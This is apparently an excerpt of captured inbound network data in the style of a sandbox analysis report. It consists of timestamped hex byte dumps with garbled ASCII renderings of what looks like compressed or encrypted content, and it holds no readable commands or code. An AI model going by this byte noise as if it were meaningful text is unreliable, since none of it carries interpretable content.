                                                                                                                                                2022-09-29 12:49:27 UTC5869INData Raw: d5 6f 6b fb c3 b3 76 0f ae ab 92 32 c8 82 f9 ca 44 59 ba d2 af d8 ea 9b 15 ed 2c 3d d6 17 48 c8 0f 8e 54 33 43 33 cf 9e 53 06 82 e4 8d 63 de b2 a0 da d1 ac 74 10 5d 55 07 f3 55 1f 98 3c 43 07 73 92 43 59 24 61 eb 97 3d 1c 4b 68 51 9a 13 d8 33 29 31 9d a6 1b d3 0e 7c 34 3e 29 c8 5b 6d e1 15 a6 dd 9e 45 39 5a 03 28 ee 16 63 03 d5 49 f4 83 2b 62 78 a6 5b 53 c1 0d aa d5 6a 42 5f 9b 05 8a c8 72 3a 24 a4 7e 07 94 47 79 87 a2 6b 61 e3 0c 5e a2 42 aa 77 82 d7 98 d5 f0 e9 1c e9 56 1e 3b 50 da a1 d4 a2 11 df 19 85 6d e5 ff 66 d1 89 c0 d4 90 7c b6 12 00 dc b5 0e 97 a4 aa 39 a5 c4 2a d8 98 15 3b fb 40 97 58 d8 a2 e0 b3 a1 33 6d dd 39 80 62 1f 59 dd a9 39 18 41 ef 76 64 8b 3e 24 50 a8 5e 32 82 5b 09 53 76 f8 64 3f 13 96 b4 27 17 bd 5d 20 ec 75 a2 33 ce 6e ed 32 2a 11
                                                                                                                                                Data Ascii: okv2DY,=HT3C3Sct]UU<CsCY$a=KhQ3)1|4>)[mE9Z(cI+bx[SjB_r:$~Gyka^BwV;Pmf|9*;@X3m9bY9Avd>$P^2[Svd?'] u3n2*
                                                                                                                                                2022-09-29 12:49:27 UTC5885INData Raw: ae 9f 16 20 6e e0 62 a3 b3 e0 1e 37 8b 3a 6e cf 7a c4 4e 95 4c 3c 41 d8 44 30 36 63 49 c9 be d5 7a 58 c4 f1 c5 00 c2 53 5a 22 a8 f1 d6 e2 26 14 f9 0e 48 2f 7f 5a e0 c5 5f a2 59 13 4f ce 30 f3 f9 a9 53 a3 b4 cd 1b 7e e6 78 e7 44 2d 51 90 47 96 c5 8a d6 16 34 a9 64 91 f7 c3 72 ee f7 93 31 fc b7 72 98 f6 a5 52 37 16 96 91 38 55 cc 51 ce cd 83 37 80 cc d1 21 e2 e0 e4 f8 05 8a b1 5c 6b 05 d9 18 da f9 37 aa 4d fd 02 b3 fc 53 0e 87 84 d6 30 2e fb 26 4f 33 ff 62 9f a8 f8 7d 1f 55 30 45 fc 84 e3 e4 24 ea 03 30 e2 5e 0c bc d9 b4 ef 6d 87 e6 ac 81 f4 72 10 43 ba 0a 09 4a 54 ff c3 98 e6 91 48 99 30 b5 13 fc 7b 67 3c 45 2e 1d 60 79 4c f0 f7 c0 f4 c4 f9 5d 43 2c 62 e7 15 fa b6 e5 71 23 1b e6 65 40 e8 13 37 65 14 cf 9a d6 98 8a fb ea 6a 8b d4 b3 13 39 83 a4 3b 48 1a d8
                                                                                                                                                Data Ascii: nb7:nzNL<AD06cIzXSZ"&H/Z_YO0S~xD-QG4dr1rR78UQ7!\k7MS0.&O3b}U0E$0^mrCJTH0{g<E.`yL]C,bq#e@7ej9;H
                                                                                                                                                2022-09-29 12:49:27 UTC5901INData Raw: aa 2d c3 c4 2e 42 92 af 03 71 01 6d 4d 6b 16 fc a8 e0 51 9d 62 9f e3 dc 40 cd 6c 4a 48 c0 b0 ef 4f 2a 1a 50 45 80 7f 03 5e bb eb e7 b9 38 f2 d1 04 57 ac b5 a6 2e 85 c1 62 ce 1e 83 3e 11 63 e2 3f c3 74 88 4a 96 c4 03 fd 34 1c 81 7c 0d 49 14 b4 e0 90 9b 8f 09 5e 4d ec cc 65 e3 5f 5d 5e 22 d5 8b 1d b9 df 8a 19 29 07 35 76 c8 db 9d 9b 8d e0 76 bb 04 67 bc 37 ab a5 e5 4d 0d c0 ac cf 0e 2f 47 ee e2 1c 3c c9 26 7c 1f 63 58 2c 11 70 a6 4d 70 de dd b7 40 ad 96 d0 2f 92 1a ef 7b 0b e6 b4 34 3d a5 6b c0 0b 72 5b 6b f4 c7 1a 6c a2 a1 d9 76 8b 5f 93 82 71 80 e4 4c 76 b8 00 51 fc 74 a5 7c 62 70 19 bd ff dd 83 e5 aa ed d7 f5 59 9b 03 3a 72 8d 07 50 12 ee 6b 50 99 bf 9a 5c 3d cb 8e 14 e4 b0 cb 34 3e f6 96 c6 6a 83 4d 86 c4 b5 d5 62 81 bd 66 a3 ea 1e 65 1b b8 fe 65 19 09
                                                                                                                                                Data Ascii: -.BqmMkQb@lJHO*PE^8W.b>c?tJ4|I^Me_]^")5vvg7M/G<&|cX,pMp@/{4=kr[klv_qLvQt|bpY:rPkP\=4>jMbfee
                                                                                                                                                2022-09-29 12:49:27 UTC5917INData Raw: 7e 9f 29 0f 2e 1a d1 bb 18 ab 58 8f e5 cc 48 ce 14 25 f5 40 cc 20 97 04 e7 23 20 27 21 de 52 77 55 e4 ea dc 2b a4 c7 89 22 a4 8f b1 40 c3 92 e9 e7 92 f8 b5 fd 09 30 32 26 0a 33 cd 1b dd 11 c3 95 8a b5 34 4d 39 fd 94 61 0a 70 8a 5d bb 7a 46 a2 3e 8a a5 a7 cf 1a 03 5a 3e 87 f9 e6 aa 90 77 38 6b c8 99 9b 5c b1 4e 29 57 98 29 08 f9 65 1b e1 0f 12 c3 40 b5 30 5c 49 45 e5 98 0e b3 a7 9d 4d fb c7 8e 21 36 fa b4 76 a3 ad dc 3f 32 d6 31 88 ac c6 13 26 37 46 14 6f c5 93 65 11 5e 37 48 88 52 68 31 ee 16 c9 26 35 fb aa da eb 2b f2 09 84 53 2d 3f dc d2 94 e6 70 2a 5a 8d 31 eb 12 20 05 de f7 29 8b 5e e0 b8 2f 50 3d ed 91 df 32 57 a0 fd 3b 7a 2f 5f 9c f6 3a ac 1f db 5b 8d c7 c7 d5 54 32 0d 91 b3 68 f5 44 7b 73 1a f5 62 28 bd 48 04 93 e6 29 ad 16 dc ca 39 c9 f1 ab b2 fa
                                                                                                                                                Data Ascii: ~).XH%@ # '!RwU+"@02&34M9ap]zF>Z>w8k\N)W)e@0\IEM!6v?21&7Foe^7HRh1&5+S-?p*Z1 )^/P=2W;z/_:[T2hD{sb(H)9
                                                                                                                                                2022-09-29 12:49:27 UTC5933INData Raw: 9d 50 ba 11 b1 2f 01 95 96 f1 76 6c c0 46 c2 07 ee 7d 1d 31 01 55 da 0b b2 68 59 ce 95 bb c8 9c 12 4f 27 d0 cf 40 3d fa 7c 8e b2 bb 2c 98 58 a4 c8 7f 07 24 69 67 a4 87 61 86 07 ba 0c 4d 9c 81 ee 32 12 32 cc 69 27 d8 b4 49 41 56 c0 e8 80 2a c8 12 0b d0 96 f0 3a d6 24 6a e4 dc 98 24 84 cd a3 c5 8f 40 7a f9 5c c8 33 28 e9 f4 bb c3 e9 d1 53 20 73 dd b1 27 24 c9 35 e2 65 78 5c 16 3f c1 8e ba 84 1e 07 21 17 63 09 28 1e 01 41 4b 5d 3b b8 84 e6 ce 7a ef 22 a6 03 83 64 8d ae 35 a2 a3 e0 79 d6 11 fb a2 43 68 6c 04 74 62 9a 28 bb 1c 84 0b df 36 03 5c c2 3e f5 61 4b 19 5e 42 a4 54 19 68 b1 e6 0b 24 67 5a dc a6 d9 8d 7e 33 b8 1d 6a 52 5d ea 7a 98 1c 79 63 6e ca e7 55 c4 95 b2 d0 c9 19 bd 6b d8 2f 41 e4 c6 9c 4a cc ad b9 1c 20 d8 61 84 bd 10 f5 4d fb 49 ff a6 93 fe be
                                                                                                                                                Data Ascii: P/vlF}1UhYO'@=|,X$igaM22i'IAV*:$j$@z\3(S s'$5ex\?!c(AK];z"d5yChltb(6\>aK^BTh$gZ~3jR]zycnUk/AJ aMI
                                                                                                                                                2022-09-29 12:49:27 UTC5949INData Raw: 31 91 23 5b df 03 72 aa 7a 41 f8 30 18 fc c8 3d 84 1d 8b b0 b6 11 a1 41 f3 63 f4 11 9b 55 1b 6e 77 f2 15 6b ec 2f f8 24 9a f1 fd b9 0b 51 61 ab 53 d2 31 31 27 3f 39 2b f9 22 5a a2 ed 5a 1c d9 ee 4f c5 6d 37 e8 25 52 a9 7a 71 90 e7 fe 8e e3 f5 4f 28 16 58 19 4f 3f bb aa 78 dd 12 64 db b9 c1 99 1f e6 5f d5 4d 39 6f e4 7a b9 bc 01 6f 5b 9a 39 93 5f 0b c4 a8 3f 3e bf 77 cc f4 53 6c 65 04 ed d1 d7 24 8b 09 fc b9 b2 22 1c 2d a8 8e 37 63 a7 da dd 21 a9 13 f3 86 14 ba b9 dd 83 75 dc 45 18 53 35 27 9d 22 f0 8b c4 dd 88 db 93 09 dc 2a 60 69 d6 9e 09 0c 62 6b b1 a1 15 46 43 66 49 c7 a7 60 7d f5 1e 94 c2 22 cc 5b b9 1e 97 7e 1d 81 d0 c2 aa 00 60 a3 4c 9c 9c 19 a3 d7 31 d4 7b e4 42 97 f1 54 f9 99 03 76 ba 90 0a 5c 35 11 f2 e4 5d 19 98 78 9f c5 1b 09 1b c3 c0 03 cf b1
                                                                                                                                                Data Ascii: 1#[rzA0=AcUnwk/$QaS11'?9+"ZZOm7%RzqO(XO?xd_M9ozo[9_?>wSle$"-7c!uES5'"*`ibkFCfI`}"[~`L1{BTv\5]x
                                                                                                                                                2022-09-29 12:49:27 UTC5965INData Raw: 21 a1 37 52 69 ca 86 5a ef e7 ce 39 17 b1 16 07 07 c7 6d f3 58 8a 6a 10 6a c4 a3 96 41 3f 43 27 27 ff 6d 02 f3 9a 75 fb 2f 34 5b f7 ee 45 d1 a9 05 34 72 69 ce 67 df 23 b4 03 b1 6a a9 e3 04 b9 75 f9 28 56 4b 61 1d ac 8d 30 df 81 13 88 50 b4 a0 8d 4e c6 e9 a5 08 5a 93 7e 22 af df 66 63 c6 15 3f f5 28 bd 16 b0 cd 46 48 fa 8a b1 19 98 52 f4 b4 5f 18 f7 ed c1 2c 11 4d 4f 13 29 3f c0 3c 91 e0 bc 28 de 8b e8 6f d9 ea 90 c2 69 1f a9 d3 57 da 10 b1 1b 37 4a e4 f8 a2 54 3b e7 86 3a 09 19 39 5f a0 e0 fd 0e 64 80 34 76 d9 53 db f9 cd 70 de 9f c4 a3 80 d2 52 2d 2e 36 d5 fb db ea 32 de 34 40 38 00 87 2e ef 01 7d 25 f1 ad 61 56 5c 82 ba 8f 1b 9f c8 b8 83 12 ed 17 2c 93 24 9b a3 44 65 47 54 bf 5f 3f 1d 84 bb 79 94 eb 22 0d 07 90 df 08 93 5a 60 78 04 24 9e e0 1b 06 28 c7
                                                                                                                                                Data Ascii: !7RiZ9mXjjA?C''mu/4[E4rig#ju(VKa0PNZ~"fc?(FHR_,MO)?<(oiW7JT;:9_d4vSpR-.624@8.}%aV\,$DeGT_?y"Z`x$(
                                                                                                                                                2022-09-29 12:49:27 UTC5981INData Raw: f7 98 c7 1d e2 71 40 07 5f 5c ad 24 37 f8 a1 9c 2c 57 f0 fe 8d 88 c6 a5 60 25 b7 2f 03 9b 99 e9 39 77 74 8f a4 41 d8 36 f8 92 0e 8c 80 bd 09 f6 a7 d5 56 43 c5 ff 47 13 76 e2 82 c5 f3 68 e1 07 b5 8e 2f 4e e0 4c f8 23 32 75 f6 8d 07 cf 98 6e 2f a1 57 3f f1 05 db ca f3 8f 79 d9 c3 a5 44 20 bc b3 44 17 f0 2b 56 a6 51 98 66 c7 1b eb 40 9d 6a 62 0a e9 d6 10 2a 01 e5 cc 90 6c 1c 47 41 20 c3 07 c4 ed 3b 4a e5 4b 8c 8f 8d 81 85 2e f1 d9 4f cb 1b dc 59 7c 8e 30 99 3e 98 d3 36 a7 a4 fc 69 40 36 f5 9a 7b e2 b8 3d 9e d9 32 db 9f 22 54 0c 19 94 ee 25 da 6e 6c f0 43 f9 10 94 ac dc 86 57 40 07 98 89 ac 7a 07 c7 a1 9c b8 b2 dc b2 32 90 8d 8f 29 c2 98 76 41 cb 19 c9 35 e4 ed d6 8a 1a d1 58 10 2a 67 83 8c f1 bb 12 66 1d 9c 6e 8d 23 e4 ef ef f8 54 d7 98 78 7d 0e 18 ba 88 0b
                                                                                                                                                Data Ascii: q@_\$7,W`%/9wtA6VCGvh/NL#2un/W?yD D+VQf@jb*lGA ;JK.OY|0>6i@6{=2"T%nlCW@z2)vA5X*gfn#Tx}
                                                                                                                                                2022-09-29 12:49:27 UTC5997INData Raw: 24 ce 4e 32 3f d1 0d 75 8e 62 16 32 53 9a 64 ea 0e f9 9a af 97 f2 65 83 bf 1b 77 f3 10 16 3b 07 7c 06 51 6b e6 03 bf c6 64 1a 86 9e c8 97 f0 10 be 20 f7 3f c8 90 1b db ee 52 c8 35 89 ec 05 75 9c 56 80 ee 4d 9f 0f 03 94 85 5a 4e 3a df 50 2b af 0d 3a 4a ac 5e a6 29 72 7c e0 aa f6 f6 87 ac 65 8c b0 b9 de af 89 86 4f 25 97 22 85 d2 55 b2 d6 2b 17 be 3d af 74 39 45 9a c4 21 16 be 65 6f b2 44 e4 79 01 6f 41 7e c5 8b b8 a5 03 86 85 8c 67 97 18 e0 31 09 7e e3 b9 93 6f e3 96 e5 29 dd a4 d1 51 0d e3 0a 0f ce 80 8f 8d 0a 24 82 ac 7d 17 54 6e e8 be 7e 38 fb f4 26 e0 a6 f3 3b 1b 38 f3 a3 d2 3a 18 ce 55 19 7d c2 fb 8a 49 b7 81 e5 38 73 a9 20 e6 96 bf 53 24 e4 2a b0 f2 b3 8f ee 3c c9 70 e3 a0 3d 49 2b bd 3b 67 a2 ce 94 d4 c7 77 e7 b7 be 3b f7 2f 8b 62 b9 1c 58 a7 0f 26
                                                                                                                                                Data Ascii: $N2?ub2Sdew;|Qkd ?R5uVMZN:P+:J^)r|eO%"U+=t9E!eoDyoA~g1~o)Q$}Tn~8&;8:U}I8s S$*<p=I+;gw;/bX&
                                                                                                                                                2022-09-29 12:49:27 UTC6013INData Raw: 5d e2 bf 02 ea 1a ac e1 88 90 38 7c aa 20 07 3f e7 32 dc 98 ee 33 8f 5f 7b 94 fc 2f aa bb 86 ee 31 d2 26 ec fb f6 96 06 65 d8 3b b8 96 cc 3d fe 3c bf a5 1c ae ff 20 97 cf f9 ae d9 f9 0c d6 ea b6 1d c7 70 d0 6c 0b 2e bd 5d b0 99 19 80 99 b5 62 83 ff 2c 06 94 a6 3a 2a 82 e6 82 cf b0 20 02 bb 32 b7 d0 ac 73 0d 41 ba 87 ea a4 26 de 80 3f d6 d4 b1 fb 83 79 43 1c 81 c5 3c c9 d5 f4 c8 50 b0 08 f0 02 33 b0 52 a4 7f 65 1a 58 db e1 7d fd c7 82 83 11 ea 34 52 00 7a eb da 46 07 29 83 10 5b a1 d1 4a c2 68 9e 70 80 c1 ca 2b be da 66 ba 2a 95 86 a7 7e 52 ef c9 4a f7 7c fb 5b 2f 1f fe bb 1e 71 1a 45 f2 fd 76 78 ff c7 d1 11 9b 06 3a 27 9a ca 6d f6 d2 5a 54 43 37 eb 36 44 da 61 8e 3c a5 0a 1e be 50 0f ea ba 83 01 91 3d 89 db 61 6f 58 00 9b 67 e4 1c 01 25 a4 92 64 a3 50 32
                                                                                                                                                Data Ascii: ]8| ?23_{/1&e;=< pl.]b,:* 2sA&?yC<P3ReX}4RzF)[Jhp+f*~RJ|[/qEvx:'mZTC76Da<P=aoXg%dP2
                                                                                                                                                2022-09-29 12:49:27 UTC6029INData Raw: ff b3 f7 14 51 26 6f 81 d9 15 41 2b 1b 6d f9 58 8d c1 01 6a d3 e8 19 b7 99 c8 3a 57 03 93 01 98 e3 2d 4a 25 b0 6e 5c 03 53 f7 a6 97 a3 4b 3d 87 a2 b5 00 24 17 2a d7 4e 1f c6 36 65 a7 0b fd 63 3f c7 bd 17 31 58 85 97 df ea 22 94 cc 24 0a a2 59 67 f3 42 a9 50 e3 95 15 55 14 51 8f de 12 6c 6a 71 2a cd d7 2c 58 d2 1f b4 3c fb c0 ef 3d 42 89 08 c8 f2 8b db 00 b5 6b b6 79 7e 22 5b 42 03 22 e8 16 94 45 2f 68 dc 61 8f 6d c2 3d 62 ab 7c 59 cd 17 ab 1c e4 a8 38 1f 76 00 26 38 c9 60 ec de 70 8e e1 04 1c c5 0a 74 f7 ef d5 7c 67 ec 37 d8 7d 86 ea 3b af 3e 6f fb b5 87 09 3f 99 33 2f e6 3a 65 be da 72 37 c9 a7 b1 a4 41 3c 76 79 1a f8 5b b9 c7 ab a4 c5 0f b6 7c 08 61 39 c7 6c 0e ee fc 8c d5 ac 35 77 50 c5 0c a7 df 67 17 ef 26 e3 b4 90 c9 84 c8 c0 9e 97 75 33 73 1d e4 48
                                                                                                                                                Data Ascii: Q&oA+mXj:W-J%n\SK=$*N6ec?1X"$YgBPUQljq*,X<=Bky~"[B"E/ham=b|Y8v&8`pt|g7};>o?3/:er7A<vy[|a9l5wPg&u3sH
                                                                                                                                                2022-09-29 12:49:27 UTC6045INData Raw: 67 44 fd b6 d6 d5 37 ed 56 ca 28 0c 57 4b 6e 5c ee 48 84 76 7a 37 5b 64 cd ca 6c 38 db 9d ab da 9b a5 fe e8 61 5b b5 43 48 b6 c8 f7 e4 39 ee b7 2e c2 4a 43 9d 73 e9 01 62 4e a3 65 4b e4 f2 0f 50 bf 56 88 7f 49 b1 ac b5 ae 75 2d 1a 70 1f bc 7b d9 0a d0 46 53 95 87 89 dd 35 28 55 3a 02 83 c2 ec b0 83 e0 f1 53 a1 c9 2c f8 db 2c d6 5f 69 df 58 a5 38 6d bd b1 b7 03 35 5a ca d4 a6 74 af 45 96 05 af 89 5a 2a 83 7e 0e 06 8d 09 57 44 9f f9 cd 0b de 0e 78 cb 6a 06 bd c3 e9 21 6e 9b e2 7d 97 b1 af 5c 18 1d 48 1d f5 9a 2c 36 ca 15 62 45 97 89 d8 65 e3 9f 0d 33 67 e7 2d 75 80 70 99 db da 61 80 8a 9a 10 03 a5 58 92 09 08 1e 6b e3 67 0d 1b 58 23 94 e7 49 fb d2 5b 33 b3 6e 7b 50 9a a0 ce 89 9a 90 f1 b3 27 a6 01 f1 11 a3 3e 16 00 33 07 c3 8f 57 54 bf 32 39 3a 06 b9 46 e4
                                                                                                                                                Data Ascii: gD7V(WKn\Hvz7[dl8a[CH9.JCsbNeKPVIu-p{FS5(U:S,,_iX8m5ZtEZ*~WDxj!n}\H,6bEe3g-upaXkgX#I[3n{P'>3WT29:F
                                                                                                                                                2022-09-29 12:49:27 UTC6061INData Raw: ac 56 a2 b5 58 d2 d0 62 9c 6e 87 3c e5 dc b4 cc 2d 4a 14 a6 5a 87 48 80 71 b4 e5 b7 10 04 64 d4 f2 09 be 92 e0 9c b2 06 a2 5c 02 7b 98 c5 e0 f1 66 00 01 f1 78 03 73 5c 36 d4 fe 14 36 93 a4 36 01 ae 67 0e 7b d9 a3 2d 75 c6 9d 59 bc d9 5a cb 17 37 f1 be a9 9b cd 29 68 63 db 68 d3 87 b0 41 45 a9 41 0d f3 69 d2 01 e5 87 c3 b5 a7 2f 41 3c e7 21 bf c2 ef 5d 3c df 2b 7c 0a 83 e8 08 d6 94 f8 0c 5a 4b 0b ac 15 58 c7 f4 ae 0c ff 7e dd e9 4a af 66 d5 63 e7 b1 f1 05 08 a0 d2 ed 70 19 6e aa 9b 4b a5 c4 ff fa 63 66 bb 63 a7 55 19 2c 16 de 20 01 71 ea b9 54 d3 79 00 fb 56 b2 2a c3 15 70 e3 96 dd b3 f3 ff 12 d1 e7 e2 fb 00 34 d0 42 e8 63 64 fa 68 eb 04 bb b1 44 60 7b 52 21 50 9b cf 9a 3f 3c b3 bb 7a c4 51 11 06 b0 8f 6c fd ad e1 6b 80 af ee 89 99 e6 5e 6b 24 04 d0 3a 46
                                                                                                                                                Data Ascii: VXbn<-JZHqd\{fxs\666g{-uYZ7)hchAEAi/A<!]<+|ZKX~JfcpnKcfcU, qTyV*p4BcdhD`{R!P?<zQlk^k$:F
                                                                                                                                                2022-09-29 12:49:27 UTC6077INData Raw: 3a d2 9e 3d 96 f7 34 b9 fe 4b 8d 01 89 92 d5 2a 8f 25 25 18 4a b5 f9 7b 4a fa 4c 3d be f7 2e 91 ef 74 76 7b 6e 89 e7 7e 5c c2 22 02 ac c5 30 0d e7 16 0d 47 cf 1a 37 fa 4c db a8 5a d6 d0 dd eb f9 f8 8d 81 3c 65 3b a3 f5 be cc 04 e0 72 ab 10 6b 0f b7 61 7f 11 d5 19 b2 4d ae 35 80 72 25 c4 63 fa b9 24 0f 32 fd fa 1c 7b ab ac f0 a9 0d 3e 57 af 76 9c 90 57 13 90 43 04 bf 07 24 b7 95 52 0b 8a 1f f8 a5 35 c0 1d cb 62 67 f0 e8 4b ac 5d 86 6a ea c9 e9 e4 e1 d6 88 4b fe 5a df 62 e2 3d 87 c1 25 61 5e ee a5 c8 7d 9f 06 a6 fa 7f e7 f4 69 e7 c0 d2 78 38 3a 98 d3 44 c3 8a 76 68 aa 5d 69 e8 6a c9 c4 59 a6 00 83 0b 71 d7 2a 45 85 e4 14 75 b0 d0 27 cc dc 32 e2 70 17 ed bc d4 d9 90 23 3b c2 4e 8a 23 1b 81 06 1f 4e 80 ba 58 80 18 5e bb 85 04 b7 b2 7a 55 3a 6d 76 5b 88 0d d9
                                                                                                                                                Data Ascii: :=4K*%%J{JL=.tv{n~\"0G7LZ<e;rkaM5r%c$2{>WvWC$R5bgK]jKZb=%a^}ix8:Dvh]ijYq*Eu'2p#;N#NX^zU:mv[
                                                                                                                                                2022-09-29 12:49:27 UTC6093INData Raw: 4e 03 14 54 eb 74 43 6d e7 50 af 4c 52 de f5 74 65 d1 0b bc 6b 05 dd ac ec d6 2f 51 af 93 5e a1 7a 4c fb 64 36 50 d7 f5 6c ed 2f 3b 8d f1 d6 a8 2d 35 94 34 2e 3a 8d c0 79 01 2a f1 6d 12 31 8a e5 90 e6 fe cb a6 b4 f0 6b 52 28 75 be 1e 8a 91 a6 ac 54 30 6c 78 f5 a6 80 e3 78 93 96 ef 7b d2 e1 33 f6 bd 70 61 2a 18 ab a3 c4 31 4d 68 0c d7 24 4d ea 71 0b 09 1a 98 81 33 8a cb a4 fc 42 51 52 dc 48 f1 e5 a2 53 12 e7 be 92 8f c4 30 06 d2 e3 ba 59 13 da 32 78 73 3c 8f 93 3c 65 66 cd 99 72 76 c4 e5 61 a1 73 e9 75 36 d0 b2 28 0d 85 f6 94 a3 59 ee 41 96 f4 df d8 8b 80 8a 4e c5 ff af 4d ac 8c a8 1d d2 31 e2 b7 7c 4f d7 d0 cf ce 8c f0 90 43 44 9b 42 1e 04 8f 8a 76 ff 79 e6 7f 5d 8a 6e d8 e1 db 71 2c b0 17 58 71 85 06 03 7a 73 51 8e b8 c7 aa 7d cf 4d fc 29 40 f6 85 36 cc
                                                                                                                                                Data Ascii: NTtCmPLRtek/Q^zLd6Pl/;-54.:y*m1kR(uT0lxx{3pa*1Mh$Mq3BQRHS0Y2xs<<efrvasu6(YANM1|OCDBvy]nq,XqzsQ}M)@6
                                                                                                                                                2022-09-29 12:49:27 UTC6109INData Raw: 15 42 28 14 c2 1e 4a ff 23 9b 5f 63 bb 54 a1 4b 8a 7b e8 e6 da 9c 1c 86 6a cd b7 e3 b6 1d 0f 0e e9 d8 a5 a6 b5 b7 2a d0 f3 2c f1 f4 70 4b c1 9d bf 75 1d 0d a2 7f 77 a5 a2 93 e2 a5 2d 1c 0e f4 05 b4 e4 b2 d6 47 a8 79 cd f9 c8 2c e4 56 3f d0 df 5b a7 72 7c fa c2 65 08 f5 9c 05 a9 76 e0 54 69 cd 28 16 4a b6 63 65 5f a0 c3 b6 0a e9 cc 31 48 98 44 e1 12 38 74 7f 90 f4 d4 6a 57 10 a5 8a 98 12 8b cc 7b 1c 6c c1 1c 0a 55 bc 71 0c 85 de 11 3f 52 3a c9 f7 33 9f 6e fb 51 8a 47 ae 84 2d ed 99 43 ae 26 05 30 9b 61 52 4d b8 26 ac 1b 54 4f e7 24 0d 19 ee 3c ce a7 35 0c 98 22 24 6b d1 01 8b 05 bc 9d e8 ab f0 5e 7f 20 d0 48 17 d0 d0 35 14 01 8b 1f 42 86 b9 da 9b 96 cf 5d 2c 71 09 5a 4d 37 af dc 0d e3 60 c7 fe 7d 45 76 85 aa ae fc 18 c1 fd d3 6f cb a4 aa ca 28 ae 08 82 a6
                                                                                                                                                Data Ascii: B(J#_cTK{j*,pKuw-Gy,V?[r|evTi(Jce_1HD8tjW{lUq?R:3nQG-C&0aRM&TO$<5"$k^ H5B],qZM7`}Evo(
                                                                                                                                                2022-09-29 12:49:27 UTC6125INData Raw: 11 20 ba 8d ab 3f 67 29 9a 17 88 56 5d cd 8a b5 58 92 79 14 96 80 4d 2d 06 a1 a9 3f c5 a9 45 75 ee 6e 8c 49 b0 00 67 6d 15 e5 17 7e 17 4a 38 e8 ca 10 1c 84 b0 58 e9 20 5f dd 85 11 a9 b6 f5 5e bd 1e 0d e0 fe 68 86 06 a5 13 18 e2 52 d0 c1 31 5e 82 e5 4f 42 4f c2 31 1a 61 64 9e b9 ba ed 47 8c 0d af ce 89 a3 ff 80 b8 b4 ea 16 f5 0e a9 8c 71 f5 32 ba 34 06 38 db 0b f7 3d 6c 92 d6 ec 29 d7 cb 6e 67 b2 f0 a8 f6 b0 00 eb 78 bb 40 6d 22 e6 52 ad ba a4 0f 7a 4b 6e 2e 20 23 07 e4 b8 ef 19 fa d2 39 2d b4 33 32 55 d5 83 9e 1b 7b e3 54 16 80 e9 62 e0 52 9f c4 f2 23 59 55 da 0d 9b 67 1a 75 23 85 2b 3b 7e 74 b8 fe 66 65 9f eb 93 78 32 83 53 e8 e1 fd 35 c3 23 ce 4d 2b f5 40 bd 45 92 a2 c5 9f 7b d6 03 8f d5 80 41 62 2a fd 41 ef 3a 74 7c 2a 24 d7 b7 dc 32 7f cf e8 c2 7b a8
                                                                                                                                                Data Ascii: ?g)V]XyM-?EunIgm~J8X _^hR1^OBO1adGq248=l)ngx@m"RzKn. #9-32U{TbR#YUgu#+;~tfex2S5#M+@E{Ab*A:t|*$2{
                                                                                                                                                2022-09-29 12:49:27 UTC6141INData Raw: 6f 25 4c 59 4e c0 de fc 85 f4 45 76 d2 97 7e 49 1f 2f dc 14 7c d8 8d e6 5b 92 da 4f cb 18 9d fe 66 5f 23 7f 0f 03 a3 16 a7 36 a0 51 e9 db d5 36 64 f8 1f 02 cf 0e b7 d7 99 a1 3e 55 d5 ae 12 92 05 ee 53 f9 cd 38 f5 8e 4b e6 64 ab e1 38 08 a7 fd 16 e7 01 ab 48 3f e3 30 71 94 20 ab 76 cd 30 a6 a0 52 27 7f 6a 1b 2e 3f 95 f7 dc c8 b1 f9 b0 8a 3c b8 49 9d f0 db fa 65 e5 9c d6 2e e1 a5 82 37 1d 0e 09 02 b9 ab 42 d4 b7 c6 43 e5 e2 1f ee b5 af 04 15 3a 25 48 79 4f 18 3b 85 d5 f6 fc 02 c5 9a 23 90 c8 f9 b1 cb 58 b7 79 48 7f 38 52 c2 3d 67 d3 37 5e c8 56 94 55 1f bb 81 e7 dc 17 23 2f 60 04 64 c9 0e 8d 60 d4 57 ff 58 cd 4c 32 89 85 26 f8 c5 ff 7b 45 c9 e7 6d 41 0d d2 5a 49 d8 54 ef cd 1c cc 02 5e a6 ae 49 c6 23 bb 0a ad 5c ec ca e0 ad 0c 93 06 d2 71 c2 59 11 75 aa ef
                                                                                                                                                Data Ascii: o%LYNEv~I/|[Of_#6Q6d>US8Kd8H?0q v0R'j.?<Ie.7BC:%HyO;#XyH8R=g7^VU#/`d`WXL2&{EmAZIT^I#\qYu
                                                                                                                                                2022-09-29 12:49:27 UTC6157INData Raw: 8a 63 81 db 21 3e 81 7f f0 a8 04 b2 45 73 88 ca a7 89 7e 55 71 ed 1b f0 70 c2 29 0d 27 55 24 33 80 5a fd d9 77 28 40 fb c7 4d 16 dd 0a ba 9d 02 cc 82 87 23 e2 8e 8f 3e 2c fa 63 42 aa f0 7e 57 fc d1 61 22 c6 e5 9e 2b 01 9a f7 da ab 75 fb 64 b3 74 80 66 4a fb c8 1e f5 a1 f4 22 4d 5f 08 43 1c 1b f3 09 06 b7 07 26 d8 3b 61 84 84 b5 35 03 1e aa 04 7b 9e 61 11 43 19 11 57 8f 65 94 40 80 05 3d 81 2a f5 3f 93 7f b3 89 f5 b4 d5 24 2a f5 b6 37 d5 89 72 fc 4a 2c ca 9a 0a cb b6 f5 e4 0c e5 bc 6f b0 8a 17 16 3f a6 2b 9f 18 5b e6 e0 22 84 9b 94 1a 25 7b be 0e cd 09 d7 28 bc bc 41 d5 b7 d6 e1 b2 b2 d0 2d 0c 0d 22 71 03 35 68 dc 7a 27 dc e5 5d 6d 6c 88 12 31 0e a0 86 28 a5 13 61 f9 f7 89 8f 27 d1 b3 fd 11 7f 4f f9 96 ef f7 04 b4 24 9b 59 fd aa 0a 7c fb 19 d5 e1 06 63 66
                                                                                                                                                Data Ascii: c!>Es~Uqp)'U$3Zw(@M#>,cB~Wa"+udtfJ"M_C&;a5{aCWe@=*?$*7rJ,o?+["%{(A-"q5hz']ml1(a'O$Y|cf
